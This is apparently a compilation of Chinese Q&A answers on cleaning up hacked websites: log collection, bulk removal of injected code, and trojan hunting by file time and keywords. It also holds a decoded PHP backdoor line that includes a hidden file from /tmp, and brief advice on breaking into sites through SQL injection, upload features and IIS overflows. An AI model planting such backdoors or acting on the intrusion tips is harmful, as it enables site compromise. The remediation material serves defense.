网站被黑、插入恶意代码怎么办?
可能以为只要把这些代码删除了既可,但是,道高一尺,魔高一丈,如果只是简单删除代码以后,绝大部会再次被黑。事实上,要很好地应对网站入侵,步骤如下。 一、下载服务器日志,ftp传输日志。 当发现网站被黑以后,首先要做的就是下载日志文件,包括服务器日志和ftp传输日志,服务器的日志位置一般是位于C:\WINDOWS \system32\Logfiles\W3SVC1。ftp日志则取决于你的服务器所安装的ftp软件,比如SERVE-U默认是在安装目录下。但是,服务器的各种日志,一定要转移出默认的地方,同时设置一下删除保护。对于虚拟主机用户。一般你的空间提供商都会提供3天之内的日志以及1个月的ftp日志下载,具体可以咨询你的空间提供商。下载日志这点很重要。它是我们接下去找出漏洞的关键。 二、替换所有恶意代码 进行下载日志的同时,应该开始删除恶意代码,以免影响用户体验。如果你拥有服务器,推荐你使用findstr,把恶意插入的代码批量替换掉。如果你使用虚拟主机,有部分虚拟主机提供批量替换功能。如果你的虚拟主机没有提供这样的功能。这项操作要谨慎点,因为是对内容直接进行替换,稍微一马虎可能让你的网页内容面目全非。 三、下载到本地杀毒,或者服务端杀毒 接下来,我们要开始找出入侵的幕后黑后了。记住,发现病毒先不要忙着删除。如果你拥有个人服务器,可以开启杀毒软看看,如果是使用虚拟主机可以下载到本地,用杀毒软件杀。发现病毒以后,刚才说的,不要忙着杀掉。查看那个病毒文件的修改时间。这个步骤是最关键的。一般对方不会只留一个后门,可能会有漏网之鱼。这时你可以搜索刚找到的那个病毒文件的修改时间,检查这段时间建立或者修改了什么文件。那些文件都是嫌疑犯,统统记住他们的文件名,注意,这边没有让你删除,要先记住文件名!如果对方的木马很隐秘,找不到,这个时候,你需要在所有的网页文件中,查找一些木马常用的词,比如asp木马,一般会有这些字符出现在木马中,比如木马,免杀,w,shell等等字符,有出现这些字符的,可能为对方留下的后门。 五、弥补对方入侵漏洞。 接着,根据日志的提示,修改页面,字符串参数过滤单引号,数字参数格式化为数字,同时删除掉其他的一些危险的存储过程。 六、修改ftp密码,超级管理员密码,3389登陆端口,用户名,密码。 对方如果已经入侵了你的站点,这些密码都不再是密码,因此最保险的做法就是全部改掉。
怎么从代码中入侵网站
首先,如果是开源模板做的网站,可以从源代码中找漏洞,比如动网的论坛就有漏洞,当然不是所有网站都用开源的模板做
最简单的就是SQL注入,利SQL语句修改和盗取数据库的资料,这个百度一搜就有N个,你可以去下载个 DoMain 试用一下注入和跨站攻击
其次就是FSO,这个功能是有权限更改文件的,也就是说你可以利用他修改服务器上的网页,这个漏洞主要出现在有上传功能的地方
还有就是IIS的溢出漏洞,利用IIS的系统文件使自已拥有管理员的权限,这个就比较难了
去买本黑客攻防全攻略吧,看书比较全面
服务器/网站被植入病毒代码是什么原因
一般来说,有以下三种原因:
1、虚拟主机网站代码有问题,存在安全漏洞造成的。
如果服务器上大部分用户的网站都正常,只有少量用户网站被黑,那么就很可能是少量用户网站被黑的网站代码有问题,存在安全漏洞造成的。造成这个问题是没有办法解决,也不是服务商的责任。
大家都知道,“虚拟主机提供商”对自己的每个虚拟主机用户都分配了FSO文件操作的权限,他们通过您分配的合法权限,可以任意改动和上传的任何文件。如果用户没有保护好您分配给他们的合法权限,令黑客有机可乘,那么,黑客就可以利用合法权限对网站进行破坏了,但是大部分用户都认为这个黑客入侵不是他自己造成的,是服务商造成的,这实际上是冤枉了服务商。例如,用户使用了一些不安全的程序(如“动网论坛”),这些程序的代码设计本身存在漏洞,很容易被黑客利用来上传网页木马,黑客可以操纵网页木马,利用合法权限来破坏您用户的数据和改动网页的文件,甚至导致网站完全打不开。这些手法是最常见的“客户的网站代码有问题,存在安全漏洞造成的”。
2、是服务器被入侵导致的。
当服务器上所有网站都被植入了病毒代码,并且可以在源文件的尾部或头部找到病毒代码文件,或者在IIS里面被植入了添加脚本,就标明是由于服务器被入侵导致的。
3、是服务器所在的机房中了ARP病毒导致的。
当服务器上所有网站都被植入了病毒代码,并且在源文件的尾部或头部无法找到病毒代码文件,就表明服务器所在的机房中了ARP病毒。这时需要联系我们来解决,一般情况下,机房会有大量服务器中毒,会有很多客户向机房反应,一般在半小时内机房就会处理的。
服务器/VPS解决办法:如装antiarp,金山ARP
入侵网站把原代码找到了之后怎么做
原代码和网站数据是两个概念 请分析清楚
下载网站数据分析他的连接文件
找出漏洞所在
最好先找到 数据库 但是一般情况下
网站的数据库是存放网站管理员密码的
用用辅臣打开数据库 一般可以入侵成功了
网站被侵入,.php代码中被植入@include(PACK('H*','2f746d702f2e6d2f696e6465782e706870'));。
PACK(H*,。。。),是将16进制字符串转码
@INCLUDE_ONCE是包含文件,并忽略错误
实际就是include_once('/tmp/.m/index.php');
你查查这个文档是不是植入了这个文件
网站被注入代码,急求解决方案
教你个最笨最快的方法。。。。
先停止网站,再用Macromedia Dreamweaver搜索被恶意注入的代码。搜索方向为站点根目录的所有代码文件。将所有代码替换为“空”
再选择所有代码文件,把属性改为“只读”
入侵网站的代码指的是什么?用的是什么语言,如何运行?
入侵网站的代码,就是漏洞代码,系统或者网站存在漏洞,才会有人利用漏洞,来针对性的设计一些可以有入侵效果的运行代码,它不分什么语言,网页代码一般是ASP的漏洞多,系统的就可以用C语言做